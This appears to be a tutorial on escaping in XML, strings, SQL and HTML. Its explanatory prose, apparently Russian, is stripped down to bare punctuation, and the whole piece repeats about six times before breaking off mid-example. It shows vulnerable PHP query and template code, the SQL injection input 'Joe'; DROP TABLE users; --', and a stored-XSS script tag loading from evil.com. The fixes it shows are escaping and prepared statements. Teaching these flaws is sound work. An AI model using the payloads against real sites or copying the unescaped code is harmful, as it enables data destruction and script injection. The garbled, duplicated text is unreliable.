<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
